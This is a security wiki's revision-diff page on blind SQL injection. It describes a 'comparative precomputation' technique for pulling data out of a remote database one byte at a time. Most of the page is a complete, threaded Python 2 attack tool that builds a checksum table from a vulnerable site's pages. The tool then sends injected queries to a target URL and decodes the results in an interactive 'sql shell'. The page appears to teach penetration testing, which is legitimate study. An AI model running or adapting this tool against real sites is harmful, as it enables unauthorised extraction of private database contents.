Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

From NetSec
Jump to: navigation, search
(The comparative precomputation attack)
(The comparative precomputation attack)
Line 1: Line 1:
==The comparative precomputation attack==
+
==Response-based result extraction==
 +
Response-based data extraction allows for blind [[SQL injection]] [[exploitation]] to retrieve more than a single byte from the remote database.  The author was able to determine that there are at least two ways to perform this task:
 +
 
 +
* A timing attack, more suited for a LAN ('''L'''ocal '''A'''rea '''N'''etwork)
 +
* A comparative precomputation attack, more suited for the WAN ('''W'''ide '''A'''rea '''N'''etwork, or in this case, the internet)
 +
 
 +
 
 +
===Timing-based===
 +
 
 +
 
 +
===The comparative precomputation attack===
 +
{{info|This attack heavily relies on the ''remote dataset'' for successful [[exploitation]] and thus its rate of data retrieval is more variable than other methods.}}
  
'''This attack relies heavily on the ''remote dataset'' for successful exploitation and is thus its rate of data retrieval is more variable than other methods.'''
 
  
 
{{code|text=
 
{{code|text=

Revision as of 07:21, 15 November 2012

Response-based result extraction

Response-based data extraction allows for blind SQL injection exploitation to retrieve more than a single byte from the remote database. The author was able to determine that there are at least two ways to perform this task:

  • A timing attack, more suited for a LAN (Local Area Network)
  • A comparative precomputation attack, more suited for the WAN (Wide Area Network, or in this case, the internet)


Timing-based

The comparative precomputation attack

c3el4.png This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.


Requirements:

  • In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data
  • Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context.



Precomputation is done for performance reasons. At the very least, a comparative test will be required. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.

  • Examining the following query:
  $query = "select * from articles where id=$input"; 
  • And the following uri:
 /articles.php?id=1
  • Testing can be used to see if there are 255 articles by visiting:
 /articles.php?id=255 Follow the next steps for automation (and sanity's) sake:
  • Choose a language supporting something similar to array_flip() for programming the automation tool.
  • Write a loop to download each article
  • In the loop, populate an array (using integer indexes) with checksum hashes as values
  • Flip the array

Almost done!

  • Then the following visit can take place:
 /articles.php?id=ascii(substr(user(),1,1))
  • Checksum the output
  • Now accessing the checksums array using the checksum of the output as the key:
  $ascii_code = $checksums[$output_checksum]; 

And the value of a byte has been determined.

Protip: This attack can be extended by:
  • Using arithmetic operators to get sequential id's offset from 0-255 (e.g. /articles.php?id=(select ascii(substr(user(),1,1))+67)
  • Using MySQL field operators and a static query that returns id's to bypass the requirement for the id's to be sequential
#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
 
BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'
 
def request(request_url):
  req = urllib2.Request(request_url)
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
  r = urllib2.urlopen(req)
  return r.read()
 
def construct_discovery_query(url, column, table, counter):
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  discovery =  discovery % (column, column, table, counter)
  return url + urllib2.quote(discovery)
 
def construct_injection_query(url, column, table, query, position):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  injection = injection % (column, column, table, query, position)
  return url + urllib2.quote(injection)
 
def get_length(url, column, table, query, ascii_table, counter):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  length_length = url + urllib2.quote(injection)
  length_length = ascii_table[md5.new(request(length_length)).digest()]
  counter += 1
 
  length = ""
  for i in range(1,length_length+1):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))" 
    injection = injection % (column, column, table, query, i)
    request_url = url + urllib2.quote(injection)
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
    counter += 1
 
  return (int(length), counter)
 
def get_query(prompt):
  while 1:
    query = raw_input(prompt)
    if query != "":
      break
  return query
 
def do_query(url, column, table, query, ascii_table, i, q):
  tmp = construct_injection_query(url, column, table, query, i)
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
 
def do_table(url, column, table, i, q):
  tmp = construct_discovery_query(url, column, table, i)
  q.put(md5.new(request(tmp)).digest())
 
def print_percent(percent, start_time):
  elapsed_time = time.time() - start_time
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  sys.stdout.flush()
 
def do_thread(target, args, counter, length, type_query):
  if type_query == 0:
    ascii_table = {}
  else:
    query_result = ""
 
  if type_query == 0:
    i = 0
  else:
    i = 1
 
 
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  sys.stdout.flush()
  start_time = time.time()
 
  while i < length:
    threads = {}
    queues  = []
 
    for j in range(0,11):
      if i < length:
        queues.append(Queue.Queue())
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
        i += 1
        counter += 1
        print_percent(100 * float(i) / float(length), start_time)
 
    for thread in threads:
      threads[thread].start()
 
    for j, thread in enumerate(sorted(threads.iterkeys())):
      if type_query == 0:
        ascii_table[queues[j].get()] = thread
      else:
        query_result += queues[j].get()
      threads[thread].join()
 
  sys.stdout.write('\n')
  sys.stdout.flush()
 
  if type_query == 0:
    return ascii_table
  else:
    return (counter, query_result)
 
def main(url, column, table):
  session_name = re.split("(https?://)?(.*)/", url)[2]
 
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  try:
    try:
      os.stat("data")
    except:
      os.mkdir("data")
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  except:
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
    current = time.time()
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
 
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
 
  while 1:
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
    if query == "exit":
      break
 
    query_result = ""
    counter = 0
    current = time.time()
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
 
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
 
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
    mysql_connection.query(query)
    result = mysql_connection.use_result()
    data = result.fetch_row()[0][0]
    mysql_connection.close()
 
    print data
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
 
  print "%s[*]%s Good bye" % (GREEN, ENDC)
 
if __name__=="__main__":
  if len(sys.argv) != 4:
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
    exit()
 
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  main(sys.argv[1], sys.argv[2], sys.argv[3])